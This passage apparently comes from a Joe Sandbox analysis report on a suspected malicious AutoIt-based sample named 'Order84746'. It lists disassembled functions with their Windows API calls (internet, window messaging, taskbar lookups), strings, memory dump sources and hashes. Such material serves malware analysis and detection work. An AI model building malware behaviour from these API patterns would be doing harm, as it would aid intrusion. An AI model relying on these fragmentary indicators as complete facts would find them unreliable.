                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                          • String ID: static
                          • API String ID: 1983116058-2160076837
                          • Opcode ID: fa41e4505ea24dd7078b72dad726265a4c4085ec99fab703e8e990007f81cd13
                          • Instruction ID: 95ab61459e5be2d742d3d7319392f48e8e2a316716f2b35fdd9204efa18da5d7
                          • Opcode Fuzzy Hash: fa41e4505ea24dd7078b72dad726265a4c4085ec99fab703e8e990007f81cd13
                          • Instruction Fuzzy Hash: 8111267262020AAFDB04DFB8CC45EEA7BA8FB48354F014628F956E2250E774E851DB60
                          Function 00949617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetWindowTextLengthW.USER32(00000000), ref: 00949699
                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009496A8
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: LengthMessageSendTextWindow
                          • String ID: edit
                          • API String ID: 2978978980-2167791130
                          • Opcode ID: 372028731897c6c766e7e1ad8b0d2b9adec8cb3754a5eabb04dd06a1a567219d
                          • Instruction ID: 8238ff797052f52782b1c90ce12851ca5f03d31d6458d597a7b3afdc47c00ff8
                          • Opcode Fuzzy Hash: 372028731897c6c766e7e1ad8b0d2b9adec8cb3754a5eabb04dd06a1a567219d
                          • Instruction Fuzzy Hash: EC118C71510208ABEB205F68DC44EEB3B6EEF05378F114714F965971E0C775DC50AB60
                          Function 00925262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 009252D5
                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 009252F4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: InfoItemMenu_memset
                          • String ID: 0
                          • API String ID: 2223754486-4108050209
                          • Opcode ID: fc38b59306f0aba651ec4f1601c4dfa358db22fe56b186241ac1e8817d35263f
                          • Instruction ID: c8870803edf0b2658dc18835f811db8b83469d7ad10968dff95e74e392b1a8f3
                          • Opcode Fuzzy Hash: fc38b59306f0aba651ec4f1601c4dfa358db22fe56b186241ac1e8817d35263f
                          • Instruction Fuzzy Hash: 5711E272D12634EBDB20DB98ED04B9D77BCAB06790F060025E911E72E8D3B0ED04C7A0
                          Function 00934D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00934DF5
                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00934E1E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Internet$OpenOption
                          • String ID: <local>
                          • API String ID: 942729171-4266983199
                          • Opcode ID: f01f970b957ecbdb9c9556e25ef8f90d69d2d26cc24076a2eb6ca451472546cd
                          • Instruction ID: a7935ff0cd476e2ca0f673bb9b658dad5639d60d9c3e898d6748652b5a10775b
                          • Opcode Fuzzy Hash: f01f970b957ecbdb9c9556e25ef8f90d69d2d26cc24076a2eb6ca451472546cd
                          • Instruction Fuzzy Hash: 6B11A0B0605221BBDB258F51C888EFBFBACFF06755F11862AF52596180D3707940DAE0
                          Function 0093A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: htonsinet_addr
                          • String ID: 255.255.255.255
                          • API String ID: 3832099526-2422070025
                          • Opcode ID: 96b095c4cebfd6fd2f227517d4e1c133affcfd3cbcab4a34359cb152f9daccd2
                          • Instruction ID: fdc4d47422f49149379c909ec90b4fcf5516be21e3528f563927c9dc502cdeb5
                          • Opcode Fuzzy Hash: 96b095c4cebfd6fd2f227517d4e1c133affcfd3cbcab4a34359cb152f9daccd2
                          • Instruction Fuzzy Hash: B101D675600304ABCB20DF68C886FEDB369EF45314F10856AF556972D1D771E805CB52
                          Function 0091B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0091B7EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: ComboBox$ListBox
                          • API String ID: 3850602802-1403004172
                          • Opcode ID: 6a435366f87c13bf7b5cdc6aeec083e39523fac2bc1c1566a64bbbb53ce20888
                          • Instruction ID: 607d8a45169502d65cb557aa28529eb37d164a2ba1a3e1e69686c306f32b7316
                          • Opcode Fuzzy Hash: 6a435366f87c13bf7b5cdc6aeec083e39523fac2bc1c1566a64bbbb53ce20888
                          • Instruction Fuzzy Hash: 2901D471B41118ABCB04EBA8CC529FE336EFF86364B04061DF462A72D2EB7459498790
                          Function 0091B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 0091B6EB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: ComboBox$ListBox
                          • API String ID: 3850602802-1403004172
                          • Opcode ID: 77d3071371a9f77fc7a693b0b605b32221c794811aa7f00257f2cc5315b10dc7
                          • Instruction ID: 945d002f19f3a25b90c6761115e1b2b6c1ea813ef72bdc0d574f0b213cfea346
                          • Opcode Fuzzy Hash: 77d3071371a9f77fc7a693b0b605b32221c794811aa7f00257f2cc5315b10dc7
                          • Instruction Fuzzy Hash: FE01A771B41008ABDB04EBA9C952BFE73AEEF56354F10001DF502B31C1DB945E1997B5
                          Function 0091B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 0091B76C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: ComboBox$ListBox
                          • API String ID: 3850602802-1403004172
                          • Opcode ID: 0842957d4534e90de0e1d73a27063f9794c8433cb0602e5dbdc393a1d80d8d07
                          • Instruction ID: ca138010f85d63e547c424fc291ce756959e382f0a375adcce0c460bb15dc581
                          • Opcode Fuzzy Hash: 0842957d4534e90de0e1d73a27063f9794c8433cb0602e5dbdc393a1d80d8d07
                          • Instruction Fuzzy Hash: 3001A272B41108BBCB00E7A8C902BFE73AEAB46344B500019B401B31D2DB645E4987B6
                          Function 00927744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ClassName_wcscmp
                          • String ID: #32770
                          • API String ID: 2292705959-463685578
                          • Opcode ID: 36cec881d9589c2991419377466d74a4193ee3a817315295c3d6c5acf5a9ee53
                          • Instruction ID: b766f85919cee4ed08144291180260c42d3cea41cc2ec68fce3b305656010214
                          • Opcode Fuzzy Hash: 36cec881d9589c2991419377466d74a4193ee3a817315295c3d6c5acf5a9ee53
                          • Instruction Fuzzy Hash: 44E0D17760432567DB10DAD5DC05F87FBACEB95764F004116F515D3041D670D60187D0
                          Function 0091A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                          Download Yara Rule
                          APIs
                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0091A63F
                            • Part of subcall function 009013F1: _doexit.LIBCMT ref: 009013FB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Message_doexit
                          • String ID: AutoIt$Error allocating memory.
                          • API String ID: 1993061046-4017498283
                          • Opcode ID: 27212f60d5b591044dd39edc345441d0e43d1a3493a2e425645f79cff9b774be
                          • Instruction ID: 324853dc6a8329e1251ca9e011d382c4ac3328cae04f3b8e405dfb156227e3b8
                          • Opcode Fuzzy Hash: 27212f60d5b591044dd39edc345441d0e43d1a3493a2e425645f79cff9b774be
                          • Instruction Fuzzy Hash: 11D05B323C972C37D21436AD6D17FD5764CDF55B99F144015FB0CD55C24DD2998041EA
                          Function 0095AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                          Download Yara Rule
                          APIs
                          • GetSystemDirectoryW.KERNEL32(?), ref: 0095ACC0
                          • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0095AEBD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: DirectoryFreeLibrarySystem
                          • String ID: WIN_XPe
                          • API String ID: 510247158-3257408948
                          • Opcode ID: f1ce76ed0acb56301348c4f96d8179a02cb44342c3801d6f479fdefd2c2944b7
                          • Instruction ID: 74c2bf276393f7ce5827db4e822947a22ce0099f45df81fcaa2b4f89d11a71dc
                          • Opcode Fuzzy Hash: f1ce76ed0acb56301348c4f96d8179a02cb44342c3801d6f479fdefd2c2944b7
                          • Instruction Fuzzy Hash: 5FE06570C14109DFCB11DBA6D9449ECF7BCAB48301F108185E562B2160C7B45A48DF25
                          Function 00948698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                          Download Yara Rule
                          APIs
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009486A2
                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 009486B5
                            • Part of subcall function 00927A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00927AD0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: FindMessagePostSleepWindow
                          • String ID: Shell_TrayWnd
                          • API String ID: 529655941-2988720461
                          • Opcode ID: 6d60b8dcc13afe1597fc44fce14cf8bb21ba82ec9906132ebee9eed8cab90494
                          • Instruction ID: 2b0deee388ea94ab4899a8890bafb6682559c81c6c6f70e30d31dc2a6b5da002
                          • Opcode Fuzzy Hash: 6d60b8dcc13afe1597fc44fce14cf8bb21ba82ec9906132ebee9eed8cab90494
                          • Instruction Fuzzy Hash: EFD02231B99324B7E2346770EC0BFC67A089B44B20F00080CF30AAA0D0C8E0E900C710
                          Function 009486CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                          Download Yara Rule
                          APIs
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009486E2
                          • PostMessageW.USER32(00000000), ref: 009486E9
                            • Part of subcall function 00927A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00927AD0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: FindMessagePostSleepWindow
                          • String ID: Shell_TrayWnd
                          • API String ID: 529655941-2988720461
                          • Opcode ID: a789a60eb412d574b99108983fa95a8e885777f3d2a1b2d8193460442fed5307
                          • Instruction ID: bd3df1548c2e8d691d2e46a070003925b7fc923ae0caff1adf6f65ade3f0b04d
                          • Opcode Fuzzy Hash: a789a60eb412d574b99108983fa95a8e885777f3d2a1b2d8193460442fed5307
                          • Instruction Fuzzy Hash: 54D02231B8A3247BF2346770EC0BFC67A089B48B20F00080CF30AEA0D0C8E0E900C715